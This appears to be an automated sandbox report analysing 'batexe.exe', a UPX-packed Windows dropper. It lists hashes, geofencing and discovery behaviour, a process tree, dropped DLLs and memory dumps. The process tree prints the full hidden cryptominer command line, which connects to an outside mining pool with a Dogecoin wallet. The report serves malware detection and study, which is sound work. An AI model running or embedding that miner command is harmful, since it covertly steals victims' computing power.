73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
292s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 16:47

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5084	b2e.exe
2236	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2236	cpuminer-sse2.exe
2236	cpuminer-sse2.exe
2236	cpuminer-sse2.exe
2236	cpuminer-sse2.exe
2236	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4676-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4676 wrote to memory of 5084	4676	batexe.exe	84
PID 4676 wrote to memory of 5084	4676	batexe.exe	84
PID 4676 wrote to memory of 5084	4676	batexe.exe	84
PID 5084 wrote to memory of 4556	5084	b2e.exe	85
PID 5084 wrote to memory of 4556	5084	b2e.exe	85
PID 5084 wrote to memory of 4556	5084	b2e.exe	85
PID 4556 wrote to memory of 2236	4556	cmd.exe	88
PID 4556 wrote to memory of 2236	4556	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Users\Admin\AppData\Local\Temp\9E63.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9E63.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9E63.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A0F3.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9E63.tmp\b2e.exe

Filesize
8.0MB

MD5
7279634f0e380860d67384613122a9b4

SHA1
5d0537b4005e31cc6f7a80cadd7ff60c58ba945c

SHA256
36f68e917f927c17c9e1aaf09c4f5daa592475d037272aeec658689c7a571678

SHA512
ab5ccebcc50e9af826b72764aed37a688c5a142badd8ce5ea388f9661ff373cd67ca4a7006f1217fb261fbe4c6454e369012caadc8ad2d0d6f7a874462800bac

Download Submit
C:\Users\Admin\AppData\Local\Temp\9E63.tmp\b2e.exe

Filesize
4.1MB

MD5
19878dfec0a8ccbbd82a092582559ad8

SHA1
c22a0d17c63b95ea34da07e7926295f9c1f412c6

SHA256
669b85f54293f4381e13f9a6e2d3b419e7a8416c47dfca28a817f25c9bfc47f1

SHA512
372b13d64d4dc1530395e7df78206958c8de0a9e43f00987f4b20019257f0c7fdd2433234affbd1cba70759e81c5f2e0067a11d8165c5b8e44cafb29be042f42

Download Submit
C:\Users\Admin\AppData\Local\Temp\9E63.tmp\b2e.exe

Filesize
3.8MB

MD5
e42d24d0796e8aa9bceba11483212998

SHA1
1a9ee53034ad560ae18abb2c680ffe825b48c6ff

SHA256
0f33dfb5107b77606c1d7bf94fed6f9007febf097cda9ffe489201fa5a8ec279

SHA512
9f6baab4033389e42a2ded749dbf25265cab83ab360e19a889b13fed8b3a332833c5673e59e1c0ecfd8275bc74d967b6cdb90552b886e5c162e10f70f01ce100

Download Submit
C:\Users\Admin\AppData\Local\Temp\A0F3.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
4cb1acfad6437192773d55f673dc483c

SHA1
20cef6f05792893ce33e0eea31b6edfecd5fd0f2

SHA256
789669109c38fa150aaeec8e2aa11a1e8f01f376f83c3494c78161f6483dfca8

SHA512
939376b39b00ea3731f73d4743e07d863716505dc2ae9ebd063592e99b17126f7a51233e1879bc2fbd0359cfbf78853b6295c4197477c17d8bcd624a6a730749

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
fe16bb3394973236a7caa3800ca480d9

SHA1
34d657adf8f3fb306b354046cf6ecabc8d76ff28

SHA256
40b0fa38099c4c32ec91b7432ec8e2010da314930b801b62c80d8f87c155faee

SHA512
230671dcf172e59af7b332c1e1db5531a2815e8a92728c0802c1512a73307b45ba76ac25651876d39955b694b8414b8995d78127bef75486eb3fe09ffd2aeb90

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
3520fd200b47922d456a2587b2f113ee

SHA1
0e4c0839b92ec2382c38f6887943356a0ca69ffe

SHA256
a3145a18c9f14a7d93cbf31fe59e83dd8ad7b304237ef026c872ef4df7197a8c

SHA512
b2e2c347126a2367f791d1bce3827fb8047fc51b446e74f85fe7439b8622a6685407e34fa066d5610e836a6d9ac27df1277d28ac36cc26add182c35872c8126c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
6209d231684a8f2e5e435f52c37246d1

SHA1
b86fbebd13d623ebc5765543b2ef075f41e57c7c

SHA256
d63535da6cdab2c1a2fe1620c6a418ba16e60f52545f5719bb88e7313f63de9c

SHA512
9d4d2d39827ebd76373a3cb02ccdc6b70737b4842aa9e9949f3c411502feda78d8c60e0612261f2b0491c928f3807c5d43030fae8d7192f265cd42fa356c9f09

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
903KB

MD5
3ca8b926eeecd97fb570f6abe593c4c5

SHA1
1f46b3b2745cf5ade9f82fa8064e21ed85e84ad9

SHA256
c29df23020fc5163bafcc33c29b8c25449666a815e2439769fd6939e9701ecfb

SHA512
49525e0ffb15d28a6a6583c728fd44e561585bf658ff511bcfda8102a8b9eb6fef7e096258a1e403afac87f0bf2ac9517c3d4d4500d4a699bb92406b614ea12d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
ec767df00ffcf99d5089a443abdce637

SHA1
33f6d609b8ed0fdc8ad24d0ca4db0ddce3d83f09

SHA256
7b488661d38d59d0d143f05b67f67ef6b18e2919c27ec3c1bfaf8adb0592f02c

SHA512
81dcae04c2ed18ef3010bd9b0fb3c3a3411f11fd9497ddec8069ac388552dde3e5f63455a90d075e474163609d0cfe63e86457e8ca9d0a113c217aed71ec68cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2236-46-0x000000005FC20000-0x000000005FCB8000-memory.dmp

Filesize
608KB

Download
memory/2236-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2236-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2236-47-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/2236-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2236-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4676-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5084-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5084-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download